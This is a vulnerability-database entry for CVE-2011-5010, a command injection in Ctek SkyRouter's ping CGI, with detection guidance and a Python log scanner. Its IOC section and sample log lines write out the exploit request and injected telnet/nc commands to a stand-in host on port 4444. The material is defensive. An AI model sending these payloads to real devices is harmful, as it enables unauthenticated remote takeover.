CVE-2011-5010
published 2011-12-25

CVE-2011-5010: apps/a3/cfg_ethping.cgi in the Ctek SkyRouter 4200 and 4300 allows remote attackers to execute arbitrary commands via shell metacharacters in the PINGADDRESS…

Priority: P179 · critical · 10.0 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Tags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 66.38% (99.2th percentile)
apps/a3/cfg_ethping.cgi in the Ctek SkyRouter 4200 and 4300 allows remote attackers to execute arbitrary commands via shell metacharacters in the PINGADDRESS parameter for a "u" action.

Affected (2 ranges)

Vendor | Product | Version range | Fixed in
ctekproducts | skyrouter | |
ctekproducts | skyrouter | |

Detection & IOCs (extracted from sources)

path: /apps/a3/cfg_ethping.cgi
url: /apps/a3/cfg_ethping.cgi
command: POST /apps/a3/cfg_ethping.cgi with data: MYLINK=%2Fapps%2Fa3%2Fcfg_ethping.cgi&CMD=u&PINGADDRESS=;<payload>+%26
  • Detect POST requests to /apps/a3/cfg_ethping.cgi whose PINGADDRESS parameter contains shell metacharacters. The sample payload uses ';' and an encoded '&'; '|', backticks and '$(' belong to the same class. A legitimate ping target is a bare IP address or hostname and never needs any of them.
  • Decode the form body before matching. In the sample payload ';' is sent literally while '&' has to be sent as %26, because a raw '&' would terminate the parameter; so look for CMD=u together with either %3B/%26 in the raw body or ';'/'&' in the decoded PINGADDRESS value, not only one of the two forms.
  • The exploit requires no authentication; flag any unauthenticated POST to cfg_ethping.cgi on CTEK SkyRouter devices as high-priority.
  • Payload delivery relies on cmd-type payloads (perl, telnet, netcat-e, or bash reverse shells); monitor for outbound connections spawned from the CGI or web-server process on the device.
  • The vulnerable parameter is PINGADDRESS with the CMD=u action; other CMD values may not reach the injection path, so treat metacharacters seen with another CMD value as lower confidence rather than ignoring them.
  • The Metasploit module disables NOPs and limits payload space to 1024 bytes; payloads must be of type 'cmd' (generic, perl, telnet, netcat-e, or bash).
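A worked detection routine for the indicators above, added here as an illustration; it is not code from this page, from Ctek, or from the Metasploit module. It decodes the form body of requests to the vulnerable CGI, flags PINGADDRESS values that carry shell metacharacters (high confidence with CMD=u, lower with any other CMD value), and additionally flags targets that are not a plain IPv4 address or hostname, which catches argument injection such as extra ping flags that a metacharacter check alone misses. The log line format ('METHOD PATH STATUS BODY'), the sample requests and the metacharacter set beyond ';' and '&' are assumptions made for the example.

```python
import re
from urllib.parse import unquote_plus

VULN_PATH = "/apps/a3/cfg_ethping.cgi"
INJECT_CMD = "u"  # the only CMD value the advisory ties to the injection path

# Characters that let a value escape a shell command line. The page's sample
# uses ';' and an encoded '&'; the rest are the same class and are assumed here.
SHELL_META = re.compile(r"[;&|`$<>(){}\r\n]")

# What a legitimate ping target looks like: a dotted IPv4 literal or a hostname.
# Anything else (spaces, extra flags) is suspicious even without metacharacters.
ALLOWED_TARGET = re.compile(r"^(?:(?:\d{1,3}\.){3}\d{1,3}|[A-Za-z0-9][A-Za-z0-9.-]{0,252})$")


def parse_form_body(body):
    """Decode an application/x-www-form-urlencoded body by hand.

    Splitting on '&' before percent-decoding matters: a raw '&' inside
    PINGADDRESS would end the parameter, so an injected '&' can only arrive
    as %26 (as in the page's sample payload), and this decoder keeps it
    inside the value where the detector will see it.
    """
    params = {}
    for pair in body.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def analyze_request(path, body):
    """Return a finding dict for one request to the device, or None if it looks benign."""
    if path != VULN_PATH:
        return None
    params = parse_form_body(body)
    cmd = params.get("CMD", "")
    target = params.get("PINGADDRESS", "")
    metas = sorted(set(SHELL_META.findall(target)))
    if metas:
        # Metacharacters with CMD=u is the exact exploit shape; with another
        # CMD value the injection path may not be reached, so rank it lower.
        severity = "high" if cmd == INJECT_CMD else "medium"
        reason = "shell metacharacters in PINGADDRESS"
    elif not ALLOWED_TARGET.match(target):
        severity = "low"
        reason = "PINGADDRESS is not a plain IPv4 address or hostname"
    else:
        return None
    return {"severity": severity, "cmd": cmd, "target": target,
            "metachars": metas, "reason": reason}


def scan_log(lines):
    """Run analyze_request over log lines of the assumed form 'METHOD PATH STATUS BODY'."""
    findings = []
    for line in lines:
        _method, path, _status, body = line.split(" ", 3)
        finding = analyze_request(path, body)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample log (not captured from a real device); addresses are from
# the documentation ranges 192.0.2.0/24 and 203.0.113.0/24.
SAMPLE_LOG = [
    # benign: an operator pings a host from the web UI
    "POST /apps/a3/cfg_ethping.cgi 200 MYLINK=%2Fapps%2Fa3%2Fcfg_ethping.cgi&CMD=u&PINGADDRESS=192.0.2.10",
    # the page's exploit shape: literal ';' then an encoded '&' to background the command
    "POST /apps/a3/cfg_ethping.cgi 200 MYLINK=%2Fapps%2Fa3%2Fcfg_ethping.cgi&CMD=u&PINGADDRESS=;telnet+203.0.113.5+4444+%26",
    # fully percent-encoded variant: %3B is ';', %7C is '|'
    "POST /apps/a3/cfg_ethping.cgi 200 MYLINK=%2Fapps%2Fa3%2Fcfg_ethping.cgi&CMD=u&PINGADDRESS=8.8.8.8%3Bid%7Cnc+203.0.113.5+4444",
    # same class of metacharacters (backticks) but a different CMD value: lower confidence
    "POST /apps/a3/cfg_ethping.cgi 200 MYLINK=%2Fapps%2Fa3%2Fcfg_ethping.cgi&CMD=x&PINGADDRESS=%60id%60",
    # no metacharacters, but extra ping flags smuggled in: argument injection
    "POST /apps/a3/cfg_ethping.cgi 200 MYLINK=%2Fapps%2Fa3%2Fcfg_ethping.cgi&CMD=u&PINGADDRESS=192.0.2.10+-f+-c+100000",
    # unrelated CGI, ignored
    "POST /apps/a3/index.cgi 200 page=status",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"[{f['severity']}] CMD={f['cmd']!r} PINGADDRESS={f['target']!r}: {f['reason']}")
```

The decoder is written by hand rather than with parse_qs so that the behaviour on ';' is fixed: older Python versions treated ';' as a pair separator, which would split the sample payload's injected command into a separate key and hide it from the check. Pointing the same routine at a web-server access log or a proxy capture only requires adapting the line split in scan_log.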

CVSS provenance

NVD: CVSS 2.0 · 10.0 CRITICAL · AV:N/AC:L/Au:N/C:C/I:C/A:C
VulnCheck: 10.0 CRITICAL